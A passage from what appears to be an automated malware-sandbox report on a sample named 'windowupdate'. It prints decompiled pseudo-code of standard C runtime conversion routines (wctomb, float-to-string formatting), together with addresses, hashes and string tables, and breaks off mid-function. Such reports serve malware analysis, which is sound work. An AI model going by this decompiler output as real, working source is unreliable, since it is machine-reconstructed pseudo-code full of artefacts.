									_t111 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x83, 0, L"%ls", L"(\"Buffer too small\", 0)");
									_t182 = _t182 + 0x18;
									__eflags = _t111 - 1;
									if(_t111 == 1) {
										asm("int3");
									}
								}
								__eflags = _v40;
								if(_v40 != 0) {
									goto L55;
								} else {
									 *((intOrPtr*)(L00D82F70(_t154))) = 0x22;
									E00D82900(L"(\"Buffer too small\", 0)", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x83, 0);
									_v64 = 0x22;
									E00D67230( &_v96);
									return _v64;
								}
							}
							__eflags = _v32;
							if(_v32 == 0) {
								__eflags = _a4;
								if(_a4 != 0) {
									 *_a4 = _v8;
								}
								_v72 = 0;
								E00D67230( &_v96);
								return _v72;
							}
							goto L42;
						}
						__eflags = (_a16 & 0x0000ffff) - 0xff;
						if((_a16 & 0x0000ffff) <= 0xff) {
							__eflags = _a8;
							if(_a8 == 0) {
								L37:
								__eflags = _a4;
								if(_a4 != 0) {
									 *_a4 = 1;
								}
								_v60 = 0;
								E00D67230( &_v96);
								return _v60;
							}
							__eflags = _a12;
							if(_a12 <= 0) {
								_v24 = 0;
							} else {
								_v24 = 1;
							}
							_v28 = _v24;
							__eflags = _v28;
							if(__eflags == 0) {
								_t125 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x60, 0, L"%ls", L"destination_count > 0");
								_t181 = _t181 + 0x18;
								__eflags = _t125 - 1;
								if(_t125 == 1) {
									asm("int3");
								}
							}
							__eflags = _v28;
							if(_v28 != 0) {
								 *_a8 = _a16;
								goto L37;
							} else {
								 *((intOrPtr*)(L00D82F70(_t151))) = 0x22;
								E00D82900(L"destination_count > 0", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x60, 0);
								_v56 = 0x22;
								E00D67230( &_v96);
								return _v56;
							}
						}
						__eflags = _a8;
						if(_a8 != 0) {
							__eflags = _a12;
							if(_a12 > 0) {
								_t151 = _a12;
								E00D4AF80(_t179, _a8, 0, _a12);
							}
						}
						 *((intOrPtr*)(L00D82F70(_t151))) = 0x2a;
						_v52 = 0x2a;
						E00D67230( &_v96);
						return _v52;
					}
					_v80 = 0;
					_v76 = 0;
					_t163 =  &_v80;
					_v20 = E00DA9E00(_a8, _a16 & 0x0000ffff,  &_v80);
					__eflags = _a4;
					if(_a4 != 0) {
						_t163 = _a4;
						 *_a4 = _v20;
					}
					__eflags = _v20 - 4;
					if(_v20 > 4) {
						_v48 =  *((intOrPtr*)(L00D82F70(_t163)));
						E00D67230( &_v96);
						return _v48;
					} else {
						_v44 = 0;
						E00D67230( &_v96);
						return _v44;
					}
				} else {
					 *((intOrPtr*)(L00D82F70(_t146))) = 0x16;
					E00D82900(L"destination_count <= INT_MAX", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x34, 0);
					return 0x16;
				}
			}


































                      0x00d95af0
                      0x00d95af0
                      0x00d95af0
                      0x00d95afc
                      0x00d95b08
                      0x00d95b0d
                      0x00d95b0d
                      0x00000000
                      0x00d95b13
                      0x00d95b1a
                      0x00d95b1e
                      0x00d95b20
                      0x00d95b23
                      0x00d95b23
                      0x00d95b29
                      0x00d95b30
                      0x00d95b3b
                      0x00d95b32
                      0x00d95b32
                      0x00d95b32
                      0x00d95b45
                      0x00d95b48
                      0x00d95b4c
                      0x00d95b63
                      0x00d95b68
                      0x00d95b6b
                      0x00d95b6e
                      0x00d95b70
                      0x00d95b70
                      0x00d95b6e
                      0x00d95b71
                      0x00d95b75
                      0x00d95bae
                      0x00d95bbb
                      0x00d95bbd
                      0x00d95bc4
                      0x00d95c35
                      0x00d95c3e
                      0x00d95c46
                      0x00d95d5c
                      0x00d95d83
                      0x00d95d87
                      0x00d95d8c
                      0x00d95d8f
                      0x00d95d92
                      0x00d95d96
                      0x00d95da2
                      0x00d95da2
                      0x00d95da6
                      0x00d95e62
                      0x00d95e67
                      0x00d95e6d
                      0x00d95e77
                      0x00000000
                      0x00d95e7c
                      0x00d95dac
                      0x00d95db2
                      0x00d95db5
                      0x00000000
                      0x00000000
                      0x00d95dbb
                      0x00d95dbf
                      0x00d95dc1
                      0x00d95dc5
                      0x00d95dd1
                      0x00d95dd6
                      0x00d95dd6
                      0x00d95dc5
                      0x00d95dd9
                      0x00d95dd9
                      0x00d95ddb
                      0x00d95de6
                      0x00d95ddd
                      0x00d95ddd
                      0x00d95ddd
                      0x00d95df0
                      0x00d95df3
                      0x00d95df7
                      0x00d95e11
                      0x00d95e16
                      0x00d95e19
                      0x00d95e1c
                      0x00d95e1e
                      0x00d95e1e
                      0x00d95e1c
                      0x00d95e1f
                      0x00d95e23
                      0x00000000
                      0x00d95e25
                      0x00d95e2a
                      0x00d95e46
                      0x00d95e4e
                      0x00d95e58
                      0x00000000
                      0x00d95e5d
                      0x00d95e23
                      0x00d95d98
                      0x00d95d9c
                      0x00d95e81
                      0x00d95e85
                      0x00d95e8d
                      0x00d95e8d
                      0x00d95e8f
                      0x00d95e99
                      0x00000000
                      0x00d95e9e
                      0x00000000
                      0x00d95d9c
                      0x00d95c50
                      0x00d95c55
                      0x00d95c97
                      0x00d95c9b
                      0x00d95d31
                      0x00d95d31
                      0x00d95d35
                      0x00d95d3a
                      0x00d95d3a
                      0x00d95d40
                      0x00d95d4a
                      0x00000000
                      0x00d95d4f
                      0x00d95ca1
                      0x00d95ca5
                      0x00d95cb0
                      0x00d95ca7
                      0x00d95ca7
                      0x00d95ca7
                      0x00d95cba
                      0x00d95cbd
                      0x00d95cc1
                      0x00d95cd8
                      0x00d95cdd
                      0x00d95ce0
                      0x00d95ce3
                      0x00d95ce5
                      0x00d95ce5
                      0x00d95ce3
                      0x00d95ce6
                      0x00d95cea
                      0x00d95d2f
                      0x00000000
                      0x00d95cec
                      0x00d95cf1
                      0x00d95d0a
                      0x00d95d12
                      0x00d95d1c
                      0x00000000
                      0x00d95d21
                      0x00d95cea
                      0x00d95c57
                      0x00d95c5b
                      0x00d95c5d
                      0x00d95c61
                      0x00d95c63
                      0x00d95c6d
                      0x00d95c72
                      0x00d95c61
                      0x00d95c7a
                      0x00d95c80
                      0x00d95c8a
                      0x00000000
                      0x00d95c8f
                      0x00d95bc8
                      0x00d95bcb
                      0x00d95bce
                      0x00d95be3
                      0x00d95be6
                      0x00d95bea
                      0x00d95bec
                      0x00d95bf2
                      0x00d95bf2
                      0x00d95bf4
                      0x00d95bf8
                      0x00d95c1a
                      0x00d95c20
                      0x00000000
                      0x00d95bfa
                      0x00d95bfa
                      0x00d95c04
                      0x00000000
                      0x00d95c09
                      0x00d95b77
                      0x00d95b7c
                      0x00d95b95
                      0x00000000
                      0x00d95b9d

                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$"$%ls$("Buffer too small", 0)$*$*$_wctomb_s_l$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
                      • API String ID: 0-2198373435
                      • Opcode ID: b36438c534877ac193563bccb9a5ebe28a9aaede43f14f9519d8d37124e049fd
                      • Instruction ID: 285a422e8f7b0293615692e638c38c1f100215d95cca0e92915e7189aa8fa43d
                      • Opcode Fuzzy Hash: b36438c534877ac193563bccb9a5ebe28a9aaede43f14f9519d8d37124e049fd
                      • Instruction Fuzzy Hash: 25B15B70940609EFDF25EF90E856BAEB7B0EF04308F148028F5116B2C5D7B69A85CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DAA060 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 236COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E00DAA060(void* __ecx, char* _a4, char _a8, char _a12, char _a16) {
				char _v5;
				char* _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				void* _t82;
				char _t89;
				char _t91;
				void* _t99;
				void* _t103;
				void* _t107;
				void* _t111;
				void* _t112;
				char _t136;
				void* _t149;

				_t112 = __ecx;
				if(_a4 == 0) {
					_v20 = 0;
				} else {
					_v20 = 1;
				}
				_v24 = _v20;
				_t157 = _v24;
				if(_v24 == 0) {
					_t111 = L00D84930(_t157, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1d, 0, L"%ls", L"buffer != nullptr");
					_t149 = _t149 + 0x18;
					if(_t111 == 1) {
						asm("int3");
					}
				}
				if(_v24 != 0) {
					__eflags = _a8;
					if(_a8 <= 0) {
						_v28 = 0;
					} else {
						_v28 = 1;
					}
					_v32 = _v28;
					__eflags = _v32;
					if(__eflags == 0) {
						_t107 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1e, 0, L"%ls", L"buffer_count > 0");
						_t149 = _t149 + 0x18;
						__eflags = _t107 - 1;
						if(_t107 == 1) {
							asm("int3");
						}
					}
					__eflags = _v32;
					if(_v32 != 0) {
						_t113 = 1;
						 *_a4 = 0;
						__eflags = _a12;
						if(_a12 <= 0) {
							_v36 = 0;
						} else {
							_t113 = _a12;
							_v36 = _a12;
						}
						__eflags = _a8 - _v36 + 1;
						if(_a8 <= _v36 + 1) {
							_v40 = 0;
						} else {
							_v40 = 1;
						}
						_v44 = _v40;
						__eflags = _v44;
						if(__eflags == 0) {
							_t103 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x21, 0, L"%ls", L"buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)");
							_t149 = _t149 + 0x18;
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								asm("int3");
							}
						}
						__eflags = _v44;
						if(_v44 != 0) {
							__eflags = _a16;
							if(_a16 == 0) {
								_v48 = 0;
							} else {
								_v48 = 1;
							}
							_v52 = _v48;
							__eflags = _v52;
							if(__eflags == 0) {
								_t99 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x22, 0, L"%ls", L"pflt != nullptr");
								_t149 = _t149 + 0x18;
								__eflags = _t99 - 1;
								if(_t99 == 1) {
									asm("int3");
								}
							}
							__eflags = _v52;
							if(_v52 != 0) {
								_v12 = _a4;
								_v16 =  *((intOrPtr*)(_a16 + 8));
								 *_v12 = 0x30;
								_t136 = _v12 + 1;
								__eflags = _t136;
								_v12 = _t136;
								while(1) {
									__eflags = _a12;
									if(_a12 <= 0) {
										break;
									}
									__eflags =  *_v16;
									if( *_v16 == 0) {
										_v5 = 0x30;
									} else {
										_v5 =  *_v16;
										_v16 = _v16 + 1;
									}
									 *_v12 = _v5;
									_v12 = _v12 + 1;
									_a12 = _a12 - 1;
								}
								 *_v12 = 0;
								__eflags = _a12;
								if(_a12 < 0) {
									L47:
									__eflags =  *_a4 - 0x31;
									if( *_a4 != 0x31) {
										_t82 = E00D82E00(_a4 + 1);
										__eflags = _a4 + 1;
										E00D4B590(_a4, _a4 + 1, _t82 + 1);
									} else {
										 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_a16 + 4)) + 1;
									}
									__eflags = 0;
									return 0;
								}
								__eflags =  *_v16 - 0x35;
								if( *_v16 < 0x35) {
									goto L47;
								}
								_t89 = _v12 - 1;
								__eflags = _t89;
								_v12 = _t89;
								while(1) {
									__eflags =  *_v12 - 0x39;
									if( *_v12 != 0x39) {
										break;
									}
									 *_v12 = 0x30;
									_v12 = _v12 - 1;
								}
								_t91 =  *_v12 + 1;
								__eflags = _t91;
								 *_v12 = _t91;
								goto L47;
							} else {
								 *((intOrPtr*)(L00D82F70(_t113))) = 0x16;
								E00D82900(L"pflt != nullptr", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x22, 0);
								return 0x16;
							}
						} else {
							 *((intOrPtr*)(L00D82F70(_t113))) = 0x22;
							E00D82900(L"buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x21, 0);
							return 0x22;
						}
					} else {
						 *((intOrPtr*)(L00D82F70(_t112))) = 0x16;
						E00D82900(L"buffer_count > 0", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1e, 0);
						return 0x16;
					}
				}
				 *((intOrPtr*)(L00D82F70(_t112))) = 0x16;
				E00D82900(L"buffer != nullptr", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1d, 0);
				return 0x16;
			}

























                      0x00daa060
                      0x00daa06c
                      0x00daa077
                      0x00daa06e
                      0x00daa06e
                      0x00daa06e
                      0x00daa081
                      0x00daa084
                      0x00daa088
                      0x00daa09f
                      0x00daa0a4
                      0x00daa0aa
                      0x00daa0ac
                      0x00daa0ac
                      0x00daa0aa
                      0x00daa0b1
                      0x00daa0e3
                      0x00daa0e7
                      0x00daa0f2
                      0x00daa0e9
                      0x00daa0e9
                      0x00daa0e9
                      0x00daa0fc
                      0x00daa0ff
                      0x00daa103
                      0x00daa11a
                      0x00daa11f
                      0x00daa122
                      0x00daa125
                      0x00daa127
                      0x00daa127
                      0x00daa125
                      0x00daa128
                      0x00daa12c
                      0x00daa15e
                      0x00daa169
                      0x00daa16d
                      0x00daa171
                      0x00daa17b
                      0x00daa173
                      0x00daa173
                      0x00daa176
                      0x00daa176
                      0x00daa188
                      0x00daa18b
                      0x00daa196
                      0x00daa18d
                      0x00daa18d
                      0x00daa18d
                      0x00daa1a0
                      0x00daa1a3
                      0x00daa1a7
                      0x00daa1be
                      0x00daa1c3
                      0x00daa1c6
                      0x00daa1c9
                      0x00daa1cb
                      0x00daa1cb
                      0x00daa1c9
                      0x00daa1cc
                      0x00daa1d0
                      0x00daa202
                      0x00daa206
                      0x00daa211
                      0x00daa208
                      0x00daa208
                      0x00daa208
                      0x00daa21b
                      0x00daa21e
                      0x00daa222
                      0x00daa239
                      0x00daa23e
                      0x00daa241
                      0x00daa244
                      0x00daa246
                      0x00daa246
                      0x00daa244
                      0x00daa247
                      0x00daa24b
                      0x00daa280
                      0x00daa289
                      0x00daa28f
                      0x00daa295
                      0x00daa295
                      0x00daa298
                      0x00daa29b
                      0x00daa29b
                      0x00daa29f
                      0x00000000
                      0x00000000
                      0x00daa2a7
                      0x00daa2a9
                      0x00daa2be
                      0x00daa2ab
                      0x00daa2b0
                      0x00daa2b9
                      0x00daa2b9
                      0x00daa2c8
                      0x00daa2d0
                      0x00daa2d9
                      0x00daa2d9
                      0x00daa2e1
                      0x00daa2e4
                      0x00daa2e8
                      0x00daa328
                      0x00daa32e
                      0x00daa331
                      0x00daa34b
                      0x00daa35a
                      0x00daa362
                      0x00daa333
                      0x00daa33f
                      0x00daa33f
                      0x00daa36a
                      0x00000000
                      0x00daa36a
                      0x00daa2f0
                      0x00daa2f3
                      0x00000000
                      0x00000000
                      0x00daa2f8
                      0x00daa2f8
                      0x00daa2fb
                      0x00daa2fe
                      0x00daa304
                      0x00daa307
                      0x00000000
                      0x00000000
                      0x00daa30c
                      0x00daa315
                      0x00daa315
                      0x00daa320
                      0x00daa320
                      0x00daa326
                      0x00000000
                      0x00daa24d
                      0x00daa252
                      0x00daa26b
                      0x00000000
                      0x00daa273
                      0x00daa1d2
                      0x00daa1d7
                      0x00daa1f0
                      0x00000000
                      0x00daa1f8
                      0x00daa12e
                      0x00daa133
                      0x00daa14c
                      0x00000000
                      0x00daa154
                      0x00daa12c
                      0x00daa0b8
                      0x00daa0d1
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: %ls$0$__acrt_fp_strflt_to_string$buffer != nullptr$buffer_count > 0$buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)$minkernel\crts\ucrt\src\appcrt\convert\_fptostr.cpp$pflt != nullptr
                      • API String ID: 4218353326-3579526835
                      • Opcode ID: 27773409b682e459f22fc06f3308be86e2a0405b635f847ee1e1efaa76811ca1
                      • Instruction ID: 23d15c1651957ad71bebfd84545acc0d0f7731690cdba3fdc69abf7d4659100e
                      • Opcode Fuzzy Hash: 27773409b682e459f22fc06f3308be86e2a0405b635f847ee1e1efaa76811ca1
                      • Instruction Fuzzy Hash: EA916070E40349AFDF10EF98C855BAEBBB0FB56708F144659E4056B282C3B59984CBB6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D976D0 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 234COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 94%
                      			E00D976D0(void* __ebx, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				char* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				intOrPtr _t124;
				signed int _t150;
				void* _t157;
				void* _t159;
				signed int _t174;
				signed int _t189;
				signed int _t201;
				signed int _t213;
				void* _t230;
				void* _t231;

				_t230 = __esi;
				_t159 = __ebx;
				if(_a12 <= 0) {
					_v20 = 0;
				} else {
					_v20 = _a12;
				}
				_t161 = _v20 + 9;
				if(_a8 <= _v20 + 9) {
					_v24 = 0;
				} else {
					_v24 = 1;
				}
				_v28 = _v24;
				_t238 = _v28;
				if(_v28 == 0) {
					_t157 = L00D84930(_t238, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x79, 0, L"%ls", L"result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)");
					_t231 = _t231 + 0x18;
					if(_t157 == 1) {
						asm("int3");
					}
				}
				if(_v28 != 0) {
					L00D66CC0(_t159,  &_v68, _t230, _a32);
					__eflags = _a28 & 0x000000ff;
					if((_a28 & 0x000000ff) != 0) {
						__eflags =  *_a24 - 0x2d;
						if( *_a24 != 0x2d) {
							_v32 = 0;
						} else {
							_v32 = 1;
						}
						_v48 = _a4 + _v32;
						__eflags = _a12;
						if(_a12 <= 0) {
							_v36 = 0;
						} else {
							_v36 = 1;
						}
						E00D97F10(_a4, _a8, _v48, _v36);
						_t231 = _t231 + 0x10;
					}
					_v8 = _a4;
					__eflags =  *_a24 - 0x2d;
					if( *_a24 == 0x2d) {
						 *_v8 = 0x2d;
						_t150 = _v8 + 1;
						__eflags = _t150;
						_v8 = _t150;
					}
					__eflags = _a12;
					if(_a12 > 0) {
						_t38 = _v8 + 1; // 0xe58b24c4
						 *_v8 =  *_t38;
						_t189 = _v8 + 1;
						__eflags = _t189;
						_v8 = _t189;
						 *_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E00D67A60( &_v68))) + 0x88))))));
					}
					__eflags = _a28 & 0x000000ff;
					if((_a28 & 0x000000ff) == 0) {
						_v40 = 1;
					} else {
						_v40 = 0;
					}
					_v8 = _v8 + _a12 + _v40;
					__eflags = _a8 - 0xffffffff;
					if(_a8 != 0xffffffff) {
						_t201 = _a8 - _v8 - _a4;
						__eflags = _t201;
						_v44 = _t201;
					} else {
						_v44 = _a8;
					}
					E00D84A20(E00D82DE0(_v8, _v44, "e+000"), _t121, L"strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), \"e+000\")", L"fp_format_e_internal", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x9c, 0);
					_v16 = _v8 + 2;
					__eflags = _a16 & 0x000000ff;
					if((_a16 & 0x000000ff) != 0) {
						 *_v8 = 0x45;
					}
					_v8 = _v8 + 1;
					_t124 = _a24;
					__eflags =  *((char*)( *((intOrPtr*)(_t124 + 8)))) - 0x30;
					if( *((char*)( *((intOrPtr*)(_t124 + 8)))) != 0x30) {
						_t174 =  *((intOrPtr*)(_a24 + 4)) - 1;
						__eflags = _t174;
						_v12 = _t174;
						if(_t174 < 0) {
							_v12 =  ~_v12;
							 *_v8 = 0x2d;
						}
						_v8 = _v8 + 1;
						__eflags = _v12 - 0x64;
						if(_v12 >= 0x64) {
							asm("cdq");
							 *_v8 =  *_v8 + _v12 / 0x64;
							asm("cdq");
							_t86 = _v12 % 0x64;
							__eflags = _t86;
							_v12 = _t86;
						}
						_v8 = _v8 + 1;
						__eflags = _v12 - 0xa;
						if(_v12 >= 0xa) {
							asm("cdq");
							 *_v8 =  *_v8 + _v12 / 0xa;
							asm("cdq");
							_t102 = _v12 % 0xa;
							__eflags = _t102;
							_v12 = _t102;
						}
						_v8 = _v8 + 1;
						_t213 =  *_v8 + _v12;
						__eflags = _t213;
						 *_v8 = _t213;
					}
					__eflags = _a20 - 2;
					if(_a20 == 2) {
						__eflags =  *_v16 - 0x30;
						if( *_v16 == 0x30) {
							__eflags = _v16 + 1;
							E00D4B590(_v16, _v16 + 1, 3);
						}
					}
					_v52 = 0;
					E00D67230( &_v68);
					return _v52;
				}
				 *((intOrPtr*)(L00D82F70(_t161))) = 0x22;
				E00D82900(L"result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)", L"fp_format_e_internal", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x79, 0);
				return 0x22;
			}


























                      0x00d976d0
                      0x00d976d0
                      0x00d976dc
                      0x00d976e6
                      0x00d976de
                      0x00d976e1
                      0x00d976e1
                      0x00d976f0
                      0x00d976f6
                      0x00d97701
                      0x00d976f8
                      0x00d976f8
                      0x00d976f8
                      0x00d9770b
                      0x00d9770e
                      0x00d97712
                      0x00d97729
                      0x00d9772e
                      0x00d97734
                      0x00d97736
                      0x00d97736
                      0x00d97734
                      0x00d9773b
                      0x00d97774
                      0x00d9777d
                      0x00d9777f
                      0x00d97784
                      0x00d97787
                      0x00d97792
                      0x00d97789
                      0x00d97789
                      0x00d97789
                      0x00d9779f
                      0x00d977a2
                      0x00d977a6
                      0x00d977b1
                      0x00d977a8
                      0x00d977a8
                      0x00d977a8
                      0x00d977c8
                      0x00d977cd
                      0x00d977cd
                      0x00d977d3
                      0x00d977d9
                      0x00d977dc
                      0x00d977e1
                      0x00d977e7
                      0x00d977e7
                      0x00d977ea
                      0x00d977ea
                      0x00d977ed
                      0x00d977f1
                      0x00d977f9
                      0x00d977fc
                      0x00d97801
                      0x00d97801
                      0x00d97804
                      0x00d9781e
                      0x00d9781e
                      0x00d97824
                      0x00d97826
                      0x00d97831
                      0x00d97828
                      0x00d97828
                      0x00d97828
                      0x00d97841
                      0x00d97844
                      0x00d97848
                      0x00d9785b
                      0x00d9785b
                      0x00d9785d
                      0x00d9784a
                      0x00d9784d
                      0x00d9784d
                      0x00d9788c
                      0x00d9789a
                      0x00d978a1
                      0x00d978a3
                      0x00d978a8
                      0x00d978a8
                      0x00d978b1
                      0x00d978b4
                      0x00d978bd
                      0x00d978c0
                      0x00d978cc
                      0x00d978cc
                      0x00d978cf
                      0x00d978d2
                      0x00d978d9
                      0x00d978df
                      0x00d978df
                      0x00d978e8
                      0x00d978eb
                      0x00d978ef
                      0x00d978f4
                      0x00d9790a
                      0x00d9790f
                      0x00d97915
                      0x00d97915
                      0x00d97917
                      0x00d97917
                      0x00d97920
                      0x00d97923
                      0x00d97927
                      0x00d9792c
                      0x00d97942
                      0x00d97947
                      0x00d9794d
                      0x00d9794d
                      0x00d9794f
                      0x00d9794f
                      0x00d97958
                      0x00d97965
                      0x00d97965
                      0x00d9796a
                      0x00d9796a
                      0x00d9796c
                      0x00d97970
                      0x00d97978
                      0x00d9797b
                      0x00d97982
                      0x00d9798a
                      0x00d9798f
                      0x00d9797b
                      0x00d97992
                      0x00d9799c
                      0x00000000
                      0x00d979a1
                      0x00d97742
                      0x00d9775b
                      0x00000000

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00D97883
                      • __invoke_watson_if_error.LIBCMTD ref: 00D9788C
                      Strings
                      • result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1), xrefs: 00D97714, 00D97756
                      • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 00D97722, 00D9774C, 00D97867
                      • d, xrefs: 00D978EB
                      • strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+, xrefs: 00D97871
                      • e+000, xrefs: 00D97876
                      • fp_format_e_internal, xrefs: 00D97751, 00D9786C
                      • %ls, xrefs: 00D97719
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error
                      • String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+
                      • API String ID: 4254006664-1740674501
                      • Opcode ID: fff64afa7d0ee19f287dcc18e4bd69d2ba0b1c6112d988214ba4b748c502a5ec
                      • Instruction ID: f239656d4b4e03164e8715d5331bb1bd9f53a994eb6613f6e4ff7c3b3dd8fcf0
                      • Opcode Fuzzy Hash: fff64afa7d0ee19f287dcc18e4bd69d2ba0b1c6112d988214ba4b748c502a5ec
                      • Instruction Fuzzy Hash: 5BA10874A14248EFCF04CF98C991BAEBBB1FF89304F248199E4556B381D775AE40DBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DA5170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 141timememoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00DA5170(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
